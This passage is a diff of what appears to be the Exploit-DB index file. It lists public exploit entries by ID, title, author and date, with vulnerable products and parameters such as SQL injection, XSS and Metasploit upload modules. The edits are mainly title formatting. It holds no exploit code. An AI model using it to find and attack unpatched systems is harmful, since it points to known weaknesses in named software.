+36810,platforms/php/remote/36810.rb,"WordPress N-Media Website Contact Form Upload",2015-04-21,Metasploit,php,remote,80 +36811,platforms/php/remote/36811.rb,"WordPress Creative Contact Form Upload",2015-04-21,Metasploit,php,remote,80 +36812,platforms/php/remote/36812.rb,"WordPress Work The Flow Upload",2015-04-21,Metasploit,php,remote,80 36813,platforms/hardware/local/36813.txt,"ADB Backup Archive Path Traversal File Overwrite",2015-04-21,"Imre Rad",hardware,local,0 36814,platforms/osx/dos/36814.c,"Mac OS X - Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0 36815,platforms/cfm/webapps/36815.txt,"BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion",2015-04-21,Portcullis,cfm,webapps,80 @@ -33245,9 +33245,9 @@ id,file,description,date,author,platform,type,port 36840,platforms/multiple/dos/36840.py,"Wireshark <= 1.12.4 - Memory Corruption and Access Violation PoC",2015-04-27,"Avinash Thapa",multiple,dos,0 36841,platforms/windows/local/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash PoC",2015-04-27,"Avinash Thapa",windows,local,0 36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS)",2015-04-27,"Adam Ziaja",php,webapps,0 -36994,platforms/cgi/webapps/36994.txt,"WebGlimpse 2.18.7 'DOC' Parameter Directory Traversal",2009-04-17,MustLive,cgi,webapps,0 +36994,platforms/cgi/webapps/36994.txt,"WebGlimpse 2.18.7 - 'DOC' Parameter Directory Traversal",2009-04-17,MustLive,cgi,webapps,0 36995,platforms/hardware/remote/36995.txt,"F5 FirePass <= 7.0 SQL Injection",2012-03-14,anonymous,hardware,remote,0 -37169,platforms/linux/remote/37169.rb,"Realtek SDK Miniigd UPnP SOAP Command Execution",2015-06-01,metasploit,linux,remote,52869 +37169,platforms/linux/remote/37169.rb,"Realtek SDK Miniigd UPnP SOAP Command Execution",2015-06-01,Metasploit,linux,remote,52869 37065,platforms/windows/local/37065.txt,"Comodo GeekBuddy < 4.18.121 - Local Privilege Escalation",2015-05-20,"Jeremy Brown",windows,local,0 36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - SEH Overflow Crash PoC",2015-04-28,"Avinash Thapa",windows,dos,0 36853,platforms/php/webapps/36853.txt,"Dolphin 7.0.x viewFriends.php Multiple Parameter XSS",2012-02-21,"Aung Khant",php,webapps,0 @@ -33266,31 +33266,31 @@ id,file,description,date,author,platform,type,port 36866,platforms/hardware/remote/36866.txt,"Xavi 7968 ADSL Router webconfig/wan/confirm.html/confirm pvcName Parameter XSS",2012-02-21,Busindre,hardware,remote,0 36867,platforms/php/webapps/36867.txt,"CPG Dragonfly CMS 9.3.3.0 Multiple Multiple Cross Site Scripting Vulnerabilities",2012-02-21,Ariko-Security,php,webapps,0 36868,platforms/hardware/dos/36868.pl,"Mercury MR804 Router Multiple HTTP Header Fields Denial Of Service Vulnerabilities",2012-02-21,demonalex,hardware,dos,0 -36869,platforms/multiple/dos/36869.txt,"IBM solidDB 6.5.0.8 'SELECT' Statement 'WHERE' Condition Denial of Service",2012-02-09,IBM,multiple,dos,0 -36870,platforms/php/webapps/36870.txt,"ContentLion Alpha 1.3 'login.php' Cross Site Scripting",2012-02-22,"Stefan Schurtz",php,webapps,0 +36869,platforms/multiple/dos/36869.txt,"IBM solidDB 6.5.0.8 - 'SELECT' Statement 'WHERE' Condition Denial of Service",2012-02-09,IBM,multiple,dos,0 +36870,platforms/php/webapps/36870.txt,"ContentLion Alpha 1.3 - 'login.php' Cross Site Scripting",2012-02-22,"Stefan Schurtz",php,webapps,0 36873,platforms/php/webapps/36873.txt,"Dolibarr 3.2 Alpha Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",php,webapps,0 -36874,platforms/php/webapps/36874.txt,"Chyrp 2.1.1 'ajax.php' HTML Injection",2012-02-22,"High-Tech Bridge SA",php,webapps,0 +36874,platforms/php/webapps/36874.txt,"Chyrp 2.1.1 - 'ajax.php' HTML Injection",2012-02-22,"High-Tech Bridge SA",php,webapps,0 36875,platforms/php/webapps/36875.txt,"Chyrp 2.1.2 includes/error.php body Parameter XSS",2012-02-22,"High-Tech Bridge SA",php,webapps,0 -36876,platforms/php/webapps/36876.txt,"Oxwall 1.1.1 'plugin' Parameter Cross Site Scripting",2012-02-22,Ariko-Security,php,webapps,0 +36876,platforms/php/webapps/36876.txt,"Oxwall 1.1.1 - 'plugin' Parameter Cross Site Scripting",2012-02-22,Ariko-Security,php,webapps,0 36877,platforms/hardware/remote/36877.html,"Multiple D-Link DCS Products 'security.cgi' Cross-Site Request Forgery",2012-02-23,"Rigan Iimrigan",hardware,remote,0 36878,platforms/php/webapps/36878.txt,"Mobile Mp3 Search Script 2.0 - 'dl.php' HTTP Response Splitting",2012-02-23,"Corrado Liotta",php,webapps,0 -36880,platforms/windows/remote/36880.rb,"Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory",2015-05-01,metasploit,windows,remote,0 +36880,platforms/windows/remote/36880.rb,"Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory",2015-05-01,Metasploit,windows,remote,0 36881,platforms/multiple/dos/36881.txt,"TestDisk 6.14 Check_OS2MB Stack Buffer Overflow",2015-05-01,Security-Assessment.com,multiple,dos,0 -36882,platforms/php/webapps/36882.txt,"MyJobList 0.1.3 'eid' Parameter SQL Injection",2012-02-26,"Red Security TEAM",php,webapps,0 +36882,platforms/php/webapps/36882.txt,"MyJobList 0.1.3 - 'eid' Parameter SQL Injection",2012-02-26,"Red Security TEAM",php,webapps,0 36883,platforms/php/webapps/36883.txt,"Webglimpse 2.x Multiple Cross Site Scripting Vulnerabilities",2012-02-26,MustLive,php,webapps,0 36884,platforms/linux/remote/36884.py,"libpurple <= 2.8.10 OTR Information Disclosure",2012-02-25,"Dimitris Glynos",linux,remote,0 36885,platforms/php/webapps/36885.txt,"Bontq 'user/' URI Cross Site Scripting",2012-02-27,sonyy,php,webapps,0 36886,platforms/php/webapps/36886.txt,"OSQA's CMS Multiple HTML Injection Vulnerabilities",2012-02-27,"Ucha Gobejishvili",php,webapps,0 36887,platforms/linux/local/36887.py,"GNOME NetworkManager 0.x Local Arbitrary File Access",2012-02-29,Ludwig,linux,local,0 -36888,platforms/php/webapps/36888.html,"Dotclear 2.4.1.2 /admin/auth.php login_data Parameter XSS",2012-02-29,"High-Tech Bridge SA",php,webapps,0 -36889,platforms/php/webapps/36889.txt,"Dotclear 2.4.1.2 /admin/blogs.php nb Parameter XSS",2012-02-29,"High-Tech Bridge SA",php,webapps,0 -36890,platforms/php/webapps/36890.txt,"Dotclear 2.4.1.2 /admin/comments.php Multiple Parameter XSS",2012-02-29,"High-Tech Bridge SA",php,webapps,0 -36891,platforms/php/webapps/36891.txt,"Dotclear 2.4.1.2 /admin/plugin.php page Parameter XSS",2012-02-29,"High-Tech Bridge SA",php,webapps,0 +36888,platforms/php/webapps/36888.html,"Dotclear 2.4.1.2 - /admin/auth.php login_data Parameter XSS",2012-02-29,"High-Tech Bridge SA",php,webapps,0 +36889,platforms/php/webapps/36889.txt,"Dotclear 2.4.1.2 - /admin/blogs.php nb Parameter XSS",2012-02-29,"High-Tech Bridge SA",php,webapps,0 +36890,platforms/php/webapps/36890.txt,"Dotclear 2.4.1.2 - /admin/comments.php Multiple Parameter XSS",2012-02-29,"High-Tech Bridge SA",php,webapps,0 +36891,platforms/php/webapps/36891.txt,"Dotclear 2.4.1.2 - /admin/plugin.php page Parameter XSS",2012-02-29,"High-Tech Bridge SA",php,webapps,0 36892,platforms/php/webapps/36892.html,"Traidnt Topics Viewer 2.0 - 'main.php' Cross Site Request Forgery",2012-02-29,"Green Hornet",php,webapps,0 36893,platforms/php/webapps/36893.txt,"Fork CMS 3.x - private/en/locale/index name Parameter XSS",2012-02-28,anonymous,php,webapps,0 36894,platforms/php/webapps/36894.txt,"Fork CMS 3.x backend/modules/error/actions/index.php parse() Function Multiple Parameter Error Display XSS",2012-02-28,anonymous,php,webapps,0 36895,platforms/php/webapps/36895.txt,"starCMS 'q' Parameter URI Cross Site Scripting",2012-03-02,Am!r,php,webapps,0 -36896,platforms/windows/dos/36896.pl,"Splash PRO 1.12.1 '.avi' File Denial of Service",2012-03-03,"Senator of Pirates",windows,dos,0 +36896,platforms/windows/dos/36896.pl,"Splash PRO 1.12.1 - '.avi' File Denial of Service",2012-03-03,"Senator of Pirates",windows,dos,0 36897,platforms/php/webapps/36897.txt,"LastGuru ASP GuestBook 'View.asp' SQL Injection",2012-03-04,demonalex,php,webapps,0 36898,platforms/php/webapps/36898.txt,"Etano 1.20/1.22 search.php Multiple Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0 36899,platforms/php/webapps/36899.txt,"Etano 1.20/1.22 photo_search.php Multiple Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0 @@ -33300,7 +33300,7 @@ id,file,description,date,author,platform,type,port 36916,platforms/php/webapps/36916.txt,"Exponent CMS 2.0 - 'src' Parameter SQL Injection",2012-03-07,"Rob Miller",php,webapps,0 36917,platforms/php/webapps/36917.txt,"OSClass 2.3.x Directory Traversal and Arbitrary File Upload Vulnerabilities",2012-03-07,"Filippo Cavallarin",php,webapps,0 36909,platforms/windows/local/36909.rb,"RM Downloader 2.7.5.400 - Local Buffer Overflow (Metasploit)",2015-05-04,"TUNISIAN CYBER",windows,local,0 -36910,platforms/php/webapps/36910.txt,"Open Realty 2.5.x 'select_users_template' Parameter Local File Include",2012-03-05,"Aung Khant",php,webapps,0 +36910,platforms/php/webapps/36910.txt,"Open Realty 2.5.x - 'select_users_template' Parameter Local File Include",2012-03-05,"Aung Khant",php,webapps,0 36911,platforms/php/webapps/36911.txt,"11in1 CMS 1.2.1 admin/comments topicID Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0 36912,platforms/php/webapps/36912.txt,"11in1 CMS 1.2.1 admin/tps id Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0 36913,platforms/php/webapps/36913.pl,"Joomla! 'redirect.php' SQL Injection",2012-03-05,"Colin Wong",php,webapps,0 @@ -33319,8 +33319,8 @@ id,file,description,date,author,platform,type,port 36968,platforms/php/webapps/36968.txt,"Max's PHP Photo Album 1.0 - 'id' Parameter Local File Include",2012-03-14,n0tch,php,webapps,0 36969,platforms/windows/dos/36969.txt,"Citrix 11.6.1 Licensing Administration Console Denial of Service",2012-03-15,Rune,windows,dos,0 36970,platforms/php/webapps/36970.txt,"JPM Article Script 6 'page2' Parameter SQL Injection",2012-03-16,"Vulnerability Research Laboratory",php,webapps,0 -36971,platforms/java/webapps/36971.txt,"JavaBB 0.99 'userId' Parameter Cross Site Scripting",2012-03-18,sonyy,java,webapps,0 -36972,platforms/windows/dos/36972.py,"TYPSoft FTP Server 1.1 'APPE' Command Remote Buffer Overflow",2012-03-19,"brock haun",windows,dos,0 +36971,platforms/java/webapps/36971.txt,"JavaBB 0.99 - 'userId' Parameter Cross Site Scripting",2012-03-18,sonyy,java,webapps,0 +36972,platforms/windows/dos/36972.py,"TYPSoft FTP Server 1.1 - 'APPE' Command Remote Buffer Overflow",2012-03-19,"brock haun",windows,dos,0 36924,platforms/ios/webapps/36924.txt,"PDF Converter & Editor 2.1 iOS - File Include",2015-05-06,Vulnerability-Lab,ios,webapps,0 36925,platforms/php/webapps/36925.py,"elFinder 2 Remote Command Execution (Via File Creation)",2015-05-06,"TUNISIAN CYBER",php,webapps,0 36926,platforms/php/webapps/36926.txt,"LeKommerce 'id' Parameter SQL Injection",2012-03-08,Mazt0r,php,webapps,0 @@ -33335,8 +33335,8 @@ id,file,description,date,author,platform,type,port 36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System /help/helpredir.aspx guide Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0 36936,platforms/asp/webapps/36936.txt,"SAP Business Objects InfoView System /webi/webi_modify.aspx id Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0 36937,platforms/php/webapps/36937.html,"phpMyVisites 2.4 phpmv2/index.php Multiple Cross Site Scripting Vulnerabilities",2012-03-09,AkaStep,php,webapps,0 -36938,platforms/php/webapps/36938.txt,"singapore 0.10.1 'gallery' Parameter Cross Site Scripting",2012-03-11,T0xic,php,webapps,0 -36939,platforms/java/webapps/36939.txt,"EJBCA 4.0.7 'issuer' Parameter Cross Site Scripting",2012-03-11,MustLive,java,webapps,0 +36938,platforms/php/webapps/36938.txt,"singapore 0.10.1 - 'gallery' Parameter Cross Site Scripting",2012-03-11,T0xic,php,webapps,0 +36939,platforms/java/webapps/36939.txt,"EJBCA 4.0.7 - 'issuer' Parameter Cross Site Scripting",2012-03-11,MustLive,java,webapps,0 36940,platforms/cgi/webapps/36940.txt,"Dell SonicWALL Secure Remote Access (SRA) Appliance Cross-Site Request Forgery",2015-05-07,"Veit Hailperin",cgi,webapps,443 36941,platforms/xml/webapps/36941.txt,"IBM WebSphere Portal Stored Cross-Site Scripting",2015-05-07,"Filippo Roncari",xml,webapps,0 36942,platforms/php/webapps/36942.txt,"WordPress Freshmail Plugin <= 1.5.8 - (shortcode.php) SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80 @@ -33353,18 +33353,18 @@ id,file,description,date,author,platform,type,port 36953,platforms/php/webapps/36953.txt,"SynTail <= 1.5 Build 566 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,0 36954,platforms/php/webapps/36954.txt,"WordPress Yet Another Related Posts Plugin <= 4.2.4 - CSRF",2015-05-08,Evex,php,webapps,80 36955,platforms/osx/remote/36955.py,"MacKeeper URL Handler Remote Code Execution",2015-05-08,"Braden Thomas",osx,remote,0 -36956,platforms/windows/remote/36956.rb,"Adobe Flash Player domainMemory ByteArray Use After Free",2015-05-08,metasploit,windows,remote,0 -36957,platforms/php/remote/36957.rb,"WordPress RevSlider File Upload and Execute",2015-05-08,metasploit,php,remote,80 +36956,platforms/windows/remote/36956.rb,"Adobe Flash Player domainMemory ByteArray Use After Free",2015-05-08,Metasploit,windows,remote,0 +36957,platforms/php/remote/36957.rb,"WordPress RevSlider File Upload and Execute",2015-05-08,Metasploit,php,remote,80 36958,platforms/php/webapps/36958.txt,"WordPress Ultimate Profile Builder Plugin 2.3.3 - CSRF",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 36959,platforms/php/webapps/36959.txt,"WordPress ClickBank Ads Plugin 1.7 - CSRF",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 36960,platforms/windows/webapps/36960.txt,"Manage Engine Asset Explorer 6.1.0 Build: 6110 - CSRF",2015-05-08,"Kaustubh G. Padwad",windows,webapps,8080 36961,platforms/php/webapps/36961.txt,"WordPress Ad Inserter Plugin 1.5.2 - CSRF",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 -36962,platforms/windows/remote/36962.rb,"Adobe Flash Player NetConnection Type Confusion",2015-05-08,metasploit,windows,remote,0 +36962,platforms/windows/remote/36962.rb,"Adobe Flash Player NetConnection Type Confusion",2015-05-08,Metasploit,windows,remote,0 36963,platforms/linux/webapps/36963.txt,"Alienvault OSSIM/USM 4.14/4.15/5.0 - Multiple Vulnerabilities",2015-05-08,"Peter Lapp",linux,webapps,0 -36964,platforms/java/remote/36964.rb,"Novell ZENworks Configuration Management Arbitrary File Upload",2015-05-08,metasploit,java,remote,443 -36974,platforms/cgi/webapps/36974.txt,"WebGlimpse 2.14.1/2.18.8 'webglimpse.cgi' Remote Command Injection",2012-03-20,"Kevin Perry",cgi,webapps,0 +36964,platforms/java/remote/36964.rb,"Novell ZENworks Configuration Management Arbitrary File Upload",2015-05-08,Metasploit,java,remote,443 +36974,platforms/cgi/webapps/36974.txt,"WebGlimpse 2.14.1/2.18.8 - 'webglimpse.cgi' Remote Command Injection",2012-03-20,"Kevin Perry",cgi,webapps,0 36975,platforms/php/webapps/36975.txt,"ClassifiedsGeek.com Vacation Packages 'listing_search' Parameter SQL Injection",2012-03-19,r45c4l,php,webapps,0 -36976,platforms/cgi/webapps/36976.txt,"WebGlimpse 2.x 'wgarcmin.cgi' Path Disclosure",2012-03-18,Websecurity,cgi,webapps,0 +36976,platforms/cgi/webapps/36976.txt,"WebGlimpse 2.x - 'wgarcmin.cgi' Path Disclosure",2012-03-18,Websecurity,cgi,webapps,0 36977,platforms/php/webapps/36977.pl,"CreateVision CreateVision CMS 'id' Parameter SQL Injection",2012-03-11,"Zwierzchowski Oskar",php,webapps,0 36978,platforms/hardware/webapps/36978.txt,"ZTE F660 - Remote Config Download",2015-05-11,"Daniel Cisa",hardware,webapps,0 36979,platforms/php/webapps/36979.sh,"WordPress N-Media Website Contact Form with File Upload 1.3.4 - File Upload",2015-05-11,"Claudio Viviani & F17.c0de",php,webapps,0 @@ -33373,7 +33373,7 @@ id,file,description,date,author,platform,type,port 36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0 37186,platforms/php/webapps/37186.txt,"VFront 0.99.2 CSRF & Persistent XSS",2015-06-03,hyp3rlinx,php,webapps,0 36984,platforms/windows/remote/36984.py,"i.FTP 2.21 - Time Field SEH Exploit",2015-05-11,"Revin Hadi Saputra",windows,remote,0 -37006,platforms/java/webapps/37006.txt,"Minify 2.1.x 'g' Parameter Cross Site Scripting",2012-03-21,"Ayoub Aboukir",java,webapps,0 +37006,platforms/java/webapps/37006.txt,"Minify 2.1.x - 'g' Parameter Cross Site Scripting",2012-03-21,"Ayoub Aboukir",java,webapps,0 36986,platforms/php/webapps/36986.txt,"Pluck 4.7 - Directory Traversal",2015-05-11,Wadeek,php,webapps,0 36987,platforms/hardware/webapps/36987.pl,"D-Link DSL-500B Gen 2 - (Parental Control Configuration Panel) Stored XSS",2015-05-11,"XLabs Security",hardware,webapps,0 36988,platforms/hardware/webapps/36988.pl,"D-Link DSL-500B Gen 2 - (URL Filter Configuration Panel) Stored XSS",2015-05-11,"XLabs Security",hardware,webapps,0 @@ -33382,11 +33382,11 @@ id,file,description,date,author,platform,type,port 36991,platforms/php/webapps/36991.txt,"eFront 3.6.15 - PHP Object Injection",2015-05-11,"Filippo Roncari",php,webapps,0 36992,platforms/php/webapps/36992.txt,"Wing FTP Server Admin <= 4.4.5 - CSRF Add Arbitrary User",2015-05-11,hyp3rlinx,php,webapps,0 36993,platforms/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Path Traversal",2015-05-11,hyp3rlinx,php,webapps,0 -36996,platforms/unix/remote/36996.rb,"SixApart MovableType - Storable Perl Code Execution",2015-05-12,metasploit,unix,remote,80 -36997,platforms/php/webapps/36997.txt,"CMSimple 3.3 'index.php' Cross Site Scripting",2012-03-21,"Stefan Schurtz",php,webapps,0 -36998,platforms/php/webapps/36998.txt,"Open Journal Systems (OJS) 2.3.6 /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php Multiple Parameter XSS",2012-03-21,"High-Tech Bridge",php,webapps,0 +36996,platforms/unix/remote/36996.rb,"SixApart MovableType - Storable Perl Code Execution",2015-05-12,Metasploit,unix,remote,80 +36997,platforms/php/webapps/36997.txt,"CMSimple 3.3 - 'index.php' Cross Site Scripting",2012-03-21,"Stefan Schurtz",php,webapps,0 +36998,platforms/php/webapps/36998.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php Multiple Parameter XSS",2012-03-21,"High-Tech Bridge",php,webapps,0 36999,platforms/php/webapps/36999.txt,"Open Journal Systems (OJS) 2.3.6 - index.php authors[][url] Parameter XSS",2012-03-21,"High-Tech Bridge",php,webapps,0 -37000,platforms/php/webapps/37000.txt,"Open Journal Systems (OJS) 2.3.6 /lib/pkp/classes/core/String.inc.php String::stripUnsafeHtml() Method XSS",2012-03-21,"High-Tech Bridge",php,webapps,0 +37000,platforms/php/webapps/37000.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/classes/core/String.inc.php String::stripUnsafeHtml() Method XSS",2012-03-21,"High-Tech Bridge",php,webapps,0 37001,platforms/php/webapps/37001.txt,"Open Journal Systems (OJS) 2.3.6 Multiple Script Arbitrary File Upload",2012-03-21,"High-Tech Bridge",php,webapps,0 37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php param Parameter Multiple Function Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0 37003,platforms/php/webapps/37003.txt,"WordPress Booking Calendar Contact Form 1.0.2 - Multiple vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0 @@ -33395,33 +33395,33 @@ id,file,description,date,author,platform,type,port 37008,platforms/php/webapps/37008.txt,"Event Calendar PHP 'cal_year' Parameter Cross Site Scripting",2012-03-24,3spi0n,php,webapps,0 37009,platforms/java/webapps/37009.xml,"Apache Struts 2.0 - 'XSLTResult.java' Remote Arbitrary File Upload",2012-03-23,voidloafer,java,webapps,0 37010,platforms/php/webapps/37010.txt,"Zumset.com FbiLike 1.00 - 'id' Parameter Cross Site Scripting",2012-03-25,Crim3R,php,webapps,0 -37011,platforms/php/webapps/37011.txt,"Geeklog 1.8.1 'index.php' SQL Injection",2012-03-27,HELLBOY,php,webapps,0 +37011,platforms/php/webapps/37011.txt,"Geeklog 1.8.1 - 'index.php' SQL Injection",2012-03-27,HELLBOY,php,webapps,0 37012,platforms/php/webapps/37012.txt,"NextBBS 0.6 - ajaxserver.php Multiple Function SQL Injection",2012-03-27,waraxe,php,webapps,0 37013,platforms/php/webapps/37013.txt,"NextBBS 0.6 index.php do Parameter XSS",2012-03-27,waraxe,php,webapps,0 37014,platforms/windows/dos/37014.py,"iFTP 2.21 Buffer OverFlow Crash PoC",2015-05-14,"dogo h@ck",windows,dos,0 37015,platforms/asp/webapps/37015.txt,"Matthew1471 BlogX Multiple Cross Site Scripting Vulnerabilities",2012-03-27,demonalex,asp,webapps,0 -37016,platforms/php/webapps/37016.txt,"WordPress Integrator 1.32 'redirect_to' Parameter Cross Site Scripting",2012-03-28,"Stefan Schurtz",php,webapps,0 -37017,platforms/php/webapps/37017.txt,"Invision Power Board 4.2.1 'searchText' Parameter Cross Site Scripting",2012-03-28,sonyy,php,webapps,0 +37016,platforms/php/webapps/37016.txt,"WordPress Integrator 1.32 - 'redirect_to' Parameter Cross Site Scripting",2012-03-28,"Stefan Schurtz",php,webapps,0 +37017,platforms/php/webapps/37017.txt,"Invision Power Board 4.2.1 - 'searchText' Parameter Cross Site Scripting",2012-03-28,sonyy,php,webapps,0 37018,platforms/php/webapps/37018.txt,"MyBB 1.6.6 - index.php conditions[usergroup][] Parameter SQL Injection",2013-03-27,"Aditya Modha",php,webapps,0 37019,platforms/php/webapps/37019.txt,"MyBB 1.6.6 - index.php conditions[usergroup][] Parameter XSS",2013-03-27,"Aditya Modha",php,webapps,0 37020,platforms/windows/remote/37020.html,"Apple Safari 5.1.5 For Windows 'window.open()' URI Spoofing",2012-03-28,Lostmon,windows,remote,0 -37021,platforms/php/webapps/37021.txt,"TomatoCart 1.2.0 Alpha 2 'json.php' Local File Include",2012-03-28,"Canberk BOLAT",php,webapps,0 +37021,platforms/php/webapps/37021.txt,"TomatoCart 1.2.0 Alpha 2 - 'json.php' Local File Include",2012-03-28,"Canberk BOLAT",php,webapps,0 37022,platforms/php/webapps/37022.txt,"ocPortal 7.1.5 code_editor.php Multiple Parameter XSS",2012-03-28,"High-Tech Bridge",php,webapps,0 37023,platforms/php/webapps/37023.txt,"EasyPHP 'main.php' SQL Injection",2012-03-29,"Skote Vahshat",php,webapps,0 -37024,platforms/php/webapps/37024.txt,"eZ Publish 4.x 'ezjscore' Module Cross Site Scripting",2012-03-29,"Yann MICHARD",php,webapps,0 +37024,platforms/php/webapps/37024.txt,"eZ Publish 4.x - 'ezjscore' Module Cross Site Scripting",2012-03-29,"Yann MICHARD",php,webapps,0 37025,platforms/php/webapps/37025.txt,"PHP Designer 2007 - Personal Multiple SQL Injection Vulnerabilities",2012-03-30,MR.XpR,php,webapps,0 37026,platforms/php/webapps/37026.txt,"e107 1.0 - 'view' Parameter SQL Injection",2012-03-30,Am!r,php,webapps,0 37027,platforms/php/webapps/37027.txt,"Simple Machines Forum (SMF) 2.0.2 index.php scheduled Parameter XSS",2012-03-29,Am!r,php,webapps,0 -37028,platforms/php/webapps/37028.txt,"JamWiki 1.1.5 'num' Parameter Cross Site Scripting",2012-03-30,"Sooraj K.S",php,webapps,0 +37028,platforms/php/webapps/37028.txt,"JamWiki 1.1.5 - 'num' Parameter Cross Site Scripting",2012-03-30,"Sooraj K.S",php,webapps,0 37029,platforms/java/webapps/37029.txt,"ManageEngine Firewall Analyzer 7.2 fw/index2.do Multiple Parameter XSS",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 37030,platforms/java/webapps/37030.txt,"ManageEngine Firewall Analyzer 7.2 fw/createAnomaly.do subTab Parameter XSS",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 37031,platforms/java/webapps/37031.txt,"ManageEngine Firewall Analyzer 7.2 fw/mindex.do url Parameter XSS",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 37032,platforms/java/webapps/37032.txt,"ManageEngine Firewall Analyzer 7.2 fw/syslogViewer.do port Parameter XSS",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 -37033,platforms/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 'domain' Parameter Cross Site Scripting",2012-04-02,"Dawid Golak",java,webapps,0 +37033,platforms/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 - 'domain' Parameter Cross Site Scripting",2012-04-02,"Dawid Golak",java,webapps,0 37034,platforms/php/webapps/37034.txt,"FlatnuX CMS controlcenter.php contents/Files Action dir Parameter Traversal Arbitrary File Access",2012-04-01,"Vulnerability Laboratory",php,webapps,0 37035,platforms/php/webapps/37035.html,"FlatnuX CMS Admin User Creation CSRF",2012-04-01,"Vulnerability Laboratory",php,webapps,0 37036,platforms/linux/dos/37036.txt,"Flock 2.6.1 Denial of Service",2012-03-31,r45c4l,linux,dos,0 -37037,platforms/hardware/remote/37037.txt,"Arbor Networks Peakflow SP 3.6.1 'index/' Cross Site Scripting",2012-04-03,b.saleh,hardware,remote,0 +37037,platforms/hardware/remote/37037.txt,"Arbor Networks Peakflow SP 3.6.1 - 'index/' Cross Site Scripting",2012-04-03,b.saleh,hardware,remote,0 37038,platforms/php/webapps/37038.txt,"osCMax 2.5 admin/login.php username Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 37039,platforms/php/webapps/37039.txt,"osCMax 2.5 admin/htaccess.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 37040,platforms/php/webapps/37040.txt,"osCMax 2.5 admin/xsell.php search Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 @@ -33444,7 +33444,7 @@ id,file,description,date,author,platform,type,port 37057,platforms/ios/webapps/37057.txt,"Wireless Photo Transfer 3.0 iOS - File Inclusion",2015-05-18,Vulnerability-Lab,ios,webapps,80 37058,platforms/multiple/webapps/37058.txt,"OYO File Manager 1.1 iOS&Android - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,multiple,webapps,8080 37059,platforms/windows/webapps/37059.html,"ManageEngine EventLog Analyzer 10.0 Build 10001 CSRF",2015-05-18,"Akash S. Chavan",windows,webapps,0 -37061,platforms/multiple/dos/37061.txt,"Sony Bravia KDL-32CX525 'hping' Command Remote Denial Of Service",2012-04-05,"Gabriel Menezes Nunes",multiple,dos,0 +37061,platforms/multiple/dos/37061.txt,"Sony Bravia KDL-32CX525 - 'hping' Command Remote Denial Of Service",2012-04-05,"Gabriel Menezes Nunes",multiple,dos,0 37062,platforms/php/webapps/37062.txt,"VBulletin 4.1.10 - 'announcementid' Parameter SQL Injection",2012-04-04,Am!r,php,webapps,0 37063,platforms/php/webapps/37063.txt,"WordPress TagGator 'tagid' Parameter - SQL Injection",2012-04-05,Am!r,php,webapps,0 37064,platforms/win_x86-64/local/37064.py,"Windows 8.0 < 8.1 x64 - TrackPopupMenu Privilege Escalation (MS14-058)",2015-05-19,ryujin,win_x86-64,local,0 @@ -33464,21 +33464,21 @@ id,file,description,date,author,platform,type,port 37078,platforms/php/webapps/37078.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php Multiple Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0 37079,platforms/php/webapps/37079.txt,"Forma LMS 1.3 Multiple SQL Injection Vulnerabilities",2015-05-21,"Filippo Roncari",php,webapps,80 37080,platforms/php/webapps/37080.txt,"WordPress WP Symposium Plugin 15.1 SQL Injection",2015-05-21,"Hannes Trunde",php,webapps,80 -37081,platforms/multiple/remote/37081.py,"McAfee Web Gateway 7.1.5.x 'Host' HTTP Header Security Bypass",2012-04-16,"Gabriel Menezes Nunes",multiple,remote,0 -37082,platforms/php/webapps/37082.txt,"Bioly 1.3 'index.php' Cross Site Scripting and SQL Injection Vulnerabilities",2012-04-16,T0xic,php,webapps,0 +37081,platforms/multiple/remote/37081.py,"McAfee Web Gateway 7.1.5.x - 'Host' HTTP Header Security Bypass",2012-04-16,"Gabriel Menezes Nunes",multiple,remote,0 +37082,platforms/php/webapps/37082.txt,"Bioly 1.3 - 'index.php' Cross Site Scripting and SQL Injection Vulnerabilities",2012-04-16,T0xic,php,webapps,0 37083,platforms/php/webapps/37083.txt,"Joomla! Beatz Plugin 1.1 Multiple Cross Site Scripting 